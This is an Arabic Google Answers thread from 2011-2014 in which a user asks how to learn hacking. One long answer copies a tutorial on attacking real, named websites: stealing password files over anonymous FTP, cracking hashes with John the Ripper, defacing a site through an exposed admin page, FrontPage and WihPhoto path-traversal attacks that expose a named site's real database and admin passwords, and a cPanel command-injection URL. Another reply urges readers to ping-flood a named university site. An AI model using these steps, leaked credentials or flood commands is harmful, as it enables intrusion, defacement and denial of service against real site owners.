الرئيسية > السؤال
السؤال
طريقة تعلم التهكير القرصنة,Hackers ؟
اخواني واخواتي الهكرز من النهاية ابغا اتعلم التهكير القرصنة,Hackers ؟
لي محاولات كثييرة بالتعلم الذاتي ولاكن لا فائدة لانه ينقصني ((البرامج)) والخبرة...
فتعلمون النت مليان برامج واغلبها ملغمة ووو والشروحات كثيرة ولاكن تعلمون التعلم المباشر افضل من التعلم الذاتي
فأذا احد عنده خبرة كبيرة في هذا الشيء ويقدر يعلمني ويكون التواصل عنطريق (الايميل او الجوال او المقابلة فيس تو فيس) مافي مشاكل
((وله مني مبلغ مادي حق تعبه)) يتم الاتفاق عليه ولاكن يكون هناك اخلاص وامانه وبدون لف ولا دوراان

وللعلم يعلم الله اني لا انوي استخدام هذه البرامج لازعاج او التخريب على المسلمين او مضرتهم بأي شكل من الاشكال... ولاكن حب الاستطلاع وللخبرة والفائدة وللدفاع عن النفس والاسلام قبل كل شي...
الهكر القرصنة Hackers‏ | Google إجابات | المواقع والبرامج | الكمبيوتر والإنترنت 14‏/10‏/2011 تم النشر بواسطة ALG-COOL.
الإجابات
1 من 12
يأخي كنت مثلك وبعدين طفشت
14‏/10‏/2011 تم النشر بواسطة قحطاني مايخون.
2 من 12
الأفضل تبتعد عن الطريق هذا طريق طويل ومحتاج مركز خبرة
16‏/10‏/2011 تم النشر بواسطة mero99.
3 من 12
عليك المحاولة عدة مرات بدون ان تباس
12‏/11‏/2011 تم النشر بواسطة بدون اسم.
4 من 12
بسم الله الرحمن الرحيم

وقل ربى زدنى علما

صدق الله العظيم !!

الكاتب !! الوطواط الاحمر

بسم الله """"

اولا يا شباب يعنى ايه ثغره وكيف تتطبقها وطيف تعرف ان الموقع يدعم بثغره

اسئله تدور فى ذهننا فلكى تعرف فتابع هاد الشرح مع التطيبق

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!

" الثغرات "

* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع

User name-Password

وهما يكونان محفوظين في ملف يسمي

PASSWDغالبا

بعض المواقع تضع هذا الملف في الإف تي بي

ما هو إف تي بي؟

FTP=File Transfer Protocol بروتوكول نقل الملفات

تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت

start==>run إبدأ ثم تشغيل

واكتب telnet

سيفتح التلنت اضغط علىRemote System ==> connect

ثم اكتب الموقع في Host Name مثلا

kahane.org أو الآيبي الخاص به

وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي

ثم اضغط connect

وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code

user anonymous

ثم انتر بعدها يطلب السيرفر كلمة السر اكتب

pass zzzoozz@yahoo.com

اكتب أي بريد ككلمة سر وطبعا سيكون وهميا

ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..

بعدها سنحصل على ملف الباسوورد

قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل

cute ftp - ws_ftp

مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان

ftp.kahane.org

لتحصل على الملف في التلنت اكتب

retr /etc/passwd

/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع

Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز scripts/passwd

وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها

الاختراق من الإف تي بي أصبحت طريقة قديمة لذا لن تجد موقعا حديثايضع ملف الباسوورد في إف تي بي ذكرنها فقط كمقدمة..إذا أردت تجريبها جربها على هذا الموقع

ftp.pangeia.com.br

ولزيادة معلوماتك عن الاختراق بالف تي بي قم بتحميل الملف الموجود بنهاية الصفحة

وبعدها؟؟المشوار مازال طويلا...كلمة السر ستكون مشفرة وسنشرح كيقية كسرها في النهاية....


--------------------------------------------------------------------------------

Exploit = اسثمار = ثغرة

الجزء المهم:

الثغرات هي أخطاء برمجية في نظام التشغيل ويمكنك استغلالها للحصول على ملف الباسوورد وقاعدة البيانات وووو..إلخ

أولا يجب أن تجمع كل المعلومات الممكنة حول الموقع :

1- المنافذ المفتوحة مثل الإف تي بي والتلنت مثلا وهذ عن طريق برامج مثل

super scan

ابحث عنه في الانترنت.

2- معرفة نظام تشغيل الموقع ويندوز أم لينوكس وغيرها والفائدة من ذلك أن كل نظام له ثغراته الخاصة به واسم المجلد الذي به ملف الباسوورد يختلف من نظام تشغيل لآخر.

لمعرفة نظام التشغيل إذهب إلى الموقع

www.netcraft.net

واكتب الموقع ثم إنتر..!!.! وستعرف بعض المعلومات عن الموقع كلآيبي ونظام التشغيل...إلخ

3- معرفة كل مايقدمه الموقع من خدمات كالبريد وغير ذلك

4- معرفة البرامج المثبتة على الموقع مثل المنتديات وبرامج السي جي آي

أنواع الثغرات

أبسط الأنواع هي التي يمكن الوصول إليها عن طريق المتصفح مثل

www.thesite.com/....../

والأنواع الباقية أو الاستثمارات :

ثغرات مكتوبة بلغة بيرل *.pl

ويمكن استخدامها في لينوكس أو في ويندوز إذا كان لديك برنامج

Active Perl

ثغرات بلغة سي

*.c يمكن استخدامها في لينوكس فقط

ثغرات بلغة شل

*.shويمكن استثمارها في لينوكس فقط

ويمكنك إيجاد الكثير من الأنواع السابقة الخاصة بلينوكس فيمواقع الثغرات وإليك بعضها

www.securiteam.com

www.securityfocus.com

www.ukrt.f2s.com

www.ussrback.com

www.packetstorm.securify.com

www.secureroot.com

www.rootshell.com

أما ثغرات المتصفح يمكنك الكشف عنها بالبرامج الموجودة في قسم البرامج.

ويمكنك من خلال البرامج الموجودة على السيرفر كالمنتديات أو برمجيات بيرل وسيجي آي أن تبحث عن ثغرات لها في مواقع الثغرات أو المواقع السابقة.وبرمجيات بيرل وسي جي آي قد تكون كتاب زوار أو محرك بحث أو حتى عداد زوار

حسنا لنفرض أنك حصلت على ملف الباسوورد..المشكلة أن كلمةالسر تكون بداخله مضللة shadowed أو مشفرة encryption.

مثال لملف باسوورد

root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp

ولأن ملف الباسوورد يحتوي على كلمات سر الأشخاص المرخص لهم بدخول الموقع قد لا بزيد عن عشرة أسطر وقد يصل آلاف الأسطر...

كلمات السر السابقة مضللة وهي علامة xوقد تختلف..

أما المشفرة والتي سنحصل عليها تكون هكذا:

مضللة root:x:0:1:Super-User:/:/sbin/sh

مشفرة root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh

root = أو الجذر اسم المستخدم

x = كلمةالسر ولكنها مضللة

وباقي السطر غير مهم

في الأغلب ستكون كلمة السر مضللة shadowed لذا عليك أن تبحث عن ملف آخر يحوي كلمة السر مشفرة يسمى ملف الشادو

shadow file

ويوجد في أماكن معينة تختلف باختلاف نظام التشغيل

token = الرمز الذي يعبر عن الباسوورد


Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *

مثال لملف شادو

root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445::::::

نجد أن كلمة السر هي

EpGw4GekZ1B9U

كيف تفك التشفير؟

عن طريق برامج مخصصة لذلك أفضلها تجده في صفحة برامج الثغرات

John the ripper

وهو يقوم بتجريب كل المحاولات الممكنة حتى يحصل على الباسوورد .

ولكن يجب أن تضع له الباسووردات في ملف مفكرة مثلا وعليك وضع الكلمة المشفرة بدلا من الx وعليك ترتيبها بحيث يكون كل حساب في سطر

طريقة تشغيله:

إذهب إلى الدوس واكتب

john passwd

حيث passwd هو الملف الذي به الباسوورد المشفرة وضعتها

سيظهر :

by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996

Loaded 1 password

**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE

وإذا أردت معرفة الباسوورد التي يخمنها الآن اضغط انتر

والباسوورد الصحيحة ستحفظ في ملف في نفس المجلد الذي به البرنامج اسمه

john.pot

وإذا أردت القيام بعملية كسر أخرى عليك إلغاء الملف أو تغيير اسمه

وفى النهايه ارجو الاستفاده من هاد الموضوع


جميع الحقوق محفوظه لدى

الوطواط الاحمر


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

الدرس الثانى ><><><

][®][^][®][][®][^][®][
وهوا ثغرات المواقع ونبداء من اول ثغراته ونبدء باولال الثغرات

~!~ ثغرة سباق المواقع ~!~

=====================

أولا إذهب إلى أي محرك بحث .. مثلا GOOGLE

وإكتبtop_list/list.php3

رح تلقى الكثير من المواقع ورح يكون اخر الموقع كدا

top_list/list.php3

مثلا هذا الموقع

http://www.coreground.de/top_list/list.php3

وكذا يكون دخلنا صفحة سباق المواقع


قم بمسح هذا "list.php3" وبدله بـ

admin/updates_admin.php3

سيصبح عنوان الموقع هكذا

http://www.coreground.de/top_list/a...ates_admin.php3

إدخل على هذا العنوان

ومن ثم سيظهر لك مربع

قم بالذهاب الى الفرونت بيج واكتب الي تبيه مثلا

HACKED BY ALNOR3S

وثم اذهب من الفرونت بيج الى خانة HTML

وانسخ مابداخله بالكامل وضعه في المربع الي في هذا العنوان



http://www.coreground.de/top_list/a...ates_admin.php3

بعد كذا اضغط رفع ليرفع الكلام الي الصفحة

ادخل الى الموقع http://www.coreground.de/top_list/list.php3


وشوف توقيعك الي سويته في الفرونت بيج

==================
عيب هذه الثغرة ان اي واحد يعرف الثغرة يقدر يخترق بعدك ...

وهذا الموقع تم اختراقه من قبلى

http://forums.thebreeze.org/

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

ثغرة الفرنت بيج





السلام عليكم شباب , الفرونت بيج يعتبر من اهم البرامج في انشاء المواقع , ولكن يوجد به ثغرة قويه تمكنك من اختراق موقع الضحيه وامتلاكه

وسوف اقوم بعرض هذهي الثغره بشكل مبسط


نبدا :


اول شي لازم تعرف اذا الموقع يدعم الفرونت بيج وله لا
روح على هذا الموقع http://www.netcraft.com واكتب اسم الموقع وستجد معلومات عن الموقع , ومن بينها اذا كان يدعم الفرونت بيج وله لا .

شرح الثغرة :

الفرونت بيج عند تنصيبه يقوم باقامة فولدرات وهي :

/_private

/_vti_bin

/_vti_cnf

/_vti_log

/_vti_pvt (اخطرهم )

/_vti_txt


ولتطبيق الثغره , اكتب اسم الموقع في المتصفح وبعدين اكتب وراه الثغره
مثال : /http://xxxx.com/_vti_pvt

او يمكنك استخدام برامج البحث عن ثغرات المواقع , و الي من اهمها برنامج عمران omran scan

اوكيه بعد هذي الخطوه بتدخل على الفولدر الي كتبناه (_vit_pvt_/)

وداخله بتحصل ملف مهم جدا باسم service.pw

هذا الملف يحتوي على باسورد صاحب الموقع ولكنه مشفر بمقياس des

ولفك الشفره بنستخدم برنامج john de ripe

حمل الملف السابق service.pw على جهازك وافتح الملف بواسطة برنامج john de ripe , الي يعتمد على تحويل الملف من encypretd الى plan text
يعنى تحويل الكلمه المشفره الى كلمه عاديه .

وبعد ما تفك الشفره خلاص صار الباسورد في ايدك وتستطيع التحكم بالموقع عن طريق الفرونت بيج او رفعه ببرامج ال ftp .

اتمنى انكم استفدتو , وانكم ما تستخدمون الطريقة في اذيت اخوانكم المسلمين .

وهذا برنامج john de riper
http://www.h4palestine.com/download/john-1.6.tar.gz

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
ثغرات المنتديات

!!!!
sniper-x

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


يتــــــــــــــــــــــــــــــــبع ][®][^][®][][®][^][®][


















ثغرة عبارة عن ثغرة php


هذه الثغرة عبارة عن ثغرة php

هذه الثغرة تعتمد على نظام الاختراق العشوائي
بمعني أننا سنبحث عن هذه الثغرة في المواقع التي تحتوي على هذه الثغرة من خلال محرك البحث جوجل
نضع في خانة البحث
"powered by wihphoto"

طبعا سوف يجد لنا مواقع كثيرة نختار الموقع الأول على سبيل المثال وهو
http://spikies-chinchilla-news.de/p...lerie/admin.php

نقوم بحذف من الموقع admin.php
ونضيف إليه الجمله التالية
sendphoto.php?album=..&pic=config.inc.php

فبالتالي يصبح العنوان لدينا كالتالي

http://spikies-chinchilla-news.de/p...=config.inc.php


ادخل تحت جمله
Sende config.inc.php an

اميلك بالكامل واضغط على زر الارسال
سوف تصلك رسالة فورية بعد ثواني

سوف تصلك على اميلك رسالة بها ملف ملف مرفق اسمه ._albums_.._config.inc.php

عندما تقوم بفتح هذا الملف سوف تجد التالي

FREE FOR NON-COMMERCIAL USE <-- */
/ *************************
*************************
*************************
**/


// WihPhoto Versionsnummer
// =======================
$version = "0.86-dev";

$language = "german.php"; // Sprachfiles z.B. "german.php" fuer Deutsch
// siehe $language Verzeichnis

// http - Adresse:
// ===============
// Bei 0.86-dev noch ohne Bedeutung!
$wihphoto_http = "http://";


// Verzeichnisse:
// ==============
$wihphoto_dir = "/var/www/web1/html/photogallerie"; // Pfad absolut
$wihphotodir = "/var/www/web1/html/photogallerie"; // Pfad absolut
$pix_base = "albums"; // ... die Orginalphotos Pfad relativ
$dyn_base = "auto"; // ... die dynamisch generierten Photos Pfad relativ
$lang_dir = "languages"; // ... language packs Pfad relativ


// WihPhoto - Darstellungsoptionen
// =========================
======
$items_per_page = 20; // maximale Anzahl Photos/Seite
$display_cols = 4; // Spalten pro Seite
$default_size = 512; // Standardbreite der Bilder bei Betrachtung des Albums
$thumb_size = 120; // Breite der generierten Thumpnails

// Breite der Bilder welche generiert werden
// =========================
================
$viewsizes = array(400,512,640,800,"Original");

// Wenn man einen Link zur Hauptseite der Homepage machen mِchte kann er mit $sitehome
// zur Navigationsleiste hinzugefügt werden
// =========================
=========================
=========================
========
$sitehome = "http://spikies-chinchilla-news.de/basefr.htm";


// Startseite von WihPhoto: 1 = Umfangreich, mit Bild, Beschreibung, ....
// 0 = einfache Auflistung der Alben
// =========================
=========================
====================
$startsite = 1;

// MySQL-DB Einstellungen
// ======================
$database = "usr_web1_5"; //MySQL Datenbankname
$sqlhost = "localhost"; //MySQL Hostname
$sqluser = "web1"; //MySQL Username
$sqlpass = "q+q27rym"; //MySQL Passwort


// Passwort zum hinzufügen von Bildinformationstext
// =========================
=======================
$adminpass= "galleriemaster";

// Wird PHP im SAFE MODE betrieben?
// =========================
=======
$safemode = false; // true ... SAFE MODE, false ... kein SAFE MODE

// E-Mail Einstellungen für die "SendPhoto" Funktion
// =========================
========================
$subject = "Spikies-Photogallerie"; // E-Mail Subject
$replyto = "Spike@spikies-chinchilla-news.de"; // Sende E-Mail Adresse


// -----------------------------------------------------------------------
// ab hier keine ؤnderungen notwendig!
// -----------------------------------------------------------------------

// MySQL - Tabellennamen
// =====================

$wp_start = "wp_start"; // Startseite (Albennamen, Albuminfos, Reihung, ...)
$wp_photoinfo = "wp_photoinfo"; // Beschreibungen zu den einzelnen Photos


// Zur Grafikenerzeugung:
// "gd" ... GD (http://www.boutell.com/gd)
// "im" ... ImageMagick (http://www.imagemagick.org/)
// =========================
=
$ImageTool = "gd";

// Falls als $ImageTool "im" also ImageMagick gewنhlt wurde
// muss der Pfad zur "convert" Funktion angegeben werden!
$convert = "/usr/bin/convert";

// EXIF Support
// (funkt noch nicht!)
// ===================
$show_exif = 0;

// Rand bei Thumpnails
// ===================
$thumb_border = 1;

// Sprachfiles laden:
require ("$wihphoto_dir/$lang_dir/$language");
?>

*************************
*************************
*************************
******
ولكن اعتقد أن أهم شئ من هذا الملف كله هو هذا المقطع

// MySQL-DB Einstellungen
// ======================
$database = "usr_web1_5"; //MySQL Datenbankname
$sqlhost = "localhost"; //MySQL Hostname
$sqluser = "web1"; //MySQL Username
$sqlpass = "q+q27rym"; //MySQL Passwort


// Passwort zum hinzufügen von Bildinformationstext
// =========================
=======================
$adminpass= "galleriemaster";


حيث يذكر لن االباسووردات الخاصة بالموقع وقاعدة البيانات :8: :8:


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


ثغره لوحه التحكم المواقع Cpanel للكاتب SmaRt

المعروف أن Cpanel هي لوحة تحكم تضاف للمواقع لإمكانية التحكم في جميع ما يحتويه الموقع
يوجد منفذ لعمل دفع أو ما يسمونه أمر ريموت في البرنامج Cpanel
اكتشفت ثغرة في هذا المنفذ الذي يظهر المطلوب لتصحيح النقص الخارجي أو
الذي يكون مزود ببيانات للسكربت الذي يقوم باسترجاع الاسم والرقم السري

الهكرز طبعا استغلوا هذه الثغرة من المشكلة بدهاء وبراعة حيث يطلبون الURI كأنهم يستخدمون السكربت عادي
ليجهزوا خاصية الشيل والأوامر التحكمية لكل قيمة ومتغير (خلصنا مناقشة )

نأتي الآن للنسخ المصابة وهي :
cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1

والثغرة تطبق على النحو التاالي :
http://www.example.com:2082/resetpass/?user=|">ls"|

حيث ان example.com هو عنوان الموقع
اعذروني لاني ما جربت الثغرة الى الان لاني اول ما قرأتها وضعتها لكم

طريقة اكتشاف الثغرة :
وصلت رسالة الى موقع www.securityfocus.com
من Arab ViruZ أحد أعضاء Saudi Devilz Team

والرسالة على النحو التالي (ترجمتها) :-
العنوان : Cpanel 8 تحتوي على مشكلة ؟؟
البريد : Arab VieruZ <arabviersus hotmail com>

مرحبا جميعا

عندما جربت ارجع الباسورد تبعي

جربت هذه الوصلة :
http://cpanel.com:2082/resetpass/?user=|">ls"|

لكنني حصلت على هذا :
*/

sh: line 1: /var/cpanel/users/: is a directory "sh: line 1: >ls: command not found"


Password Reset
Resetting password for |">ls"|: A confirmation email has been sent to the email address
on file.

*/

انظر الى هذه
sh: line 1: >ls: command not found

هل هذه مشكلة

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



!!!!
sniper-x
---------------------------------------------------
الحل
---------------------------------------------------


للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وضعت <img> او <Demon> او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .


.
منقول الكاتب الاصلي الوطواط الاحمر

أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين[/size][/color]‏
25‏/11‏/2011 تم النشر بواسطة بروفة raouf.
5 من 12
القرصة طريق طويل يبغاله تدريب واعود كل يوم كون حاول بتجي معاك صح
ارجوا منكم استخدام هذا الكود في الرن او في التشغيل
ping -n 1000 -1 400 www.sabauni.net‏
27‏/1‏/2012 تم النشر بواسطة بدون اسم.
6 من 12
ملل  Q_Q‏
1‏/4‏/2013 تم النشر بواسطة بدون اسم.
7 من 12
اسمع مني انا تعلمت الهكر انا وكم واحد وكان افضل مهكرين يوم من الايام صحبي ان سجن بعده وقفت
من كل شى لكن مازل الهكر صعب واذا تبغ واحد يعلمك انا اعرف واحد
19‏/7‏/2013 تم النشر بواسطة فهد الغامدي 201.
8 من 12
قولو له إجابة جيدة يا مجانين دوختو الزلمة كل ما يريدو هو تعلم القرصنة مو إختراع صاروخ كلو ببعضو تعلم خطوات بخطوات
23‏/7‏/2013 تم النشر بواسطة avan ali (avan ali).
9 من 12
جميل وانا كمان بدي اتعلم
19‏/8‏/2013 تم النشر بواسطة بدون اسم.
10 من 12
انا قرصان
2‏/4‏/2014 تم النشر بواسطة بدون اسم.
11 من 12
اسمع اذ انك من اهل المدينة او اي واحد من اهل المدينة ويبي يتعلم فاعرف مكان ****** يعلمو واذ واحد منكم مهكر الان يطلع اللي كتبته عل ى صورة نجووم
8‏/4‏/2014 تم النشر بواسطة بدون اسم.
12 من 12
طيب انا ابي اتعلم ,, بس ابي حسابات الانستقرام بس

راسلوني على الكيك اذا تقدرون تفيدوني

mn9oorif5amh‏
21‏/4‏/2014 تم النشر بواسطة بدون اسم.
قد يهمك أيضًا
هل يمكن تعلم القرصنة على الحاسوب
"هاكرز" عرب يشنون حرب إلكترونية على إسرائيل لمحوها من الإنترنت
اريد رابط تنزيل كتاب The Hackers Underground Handbook مجاني ؟
عرف القرصنة الإلكترونية
معنى كلمت قرصان
تسجيل الدخول
عرض إجابات Google في:: Mobile | كلاسيكي
©2014 Google - سياسة الخصوصية - مساعدة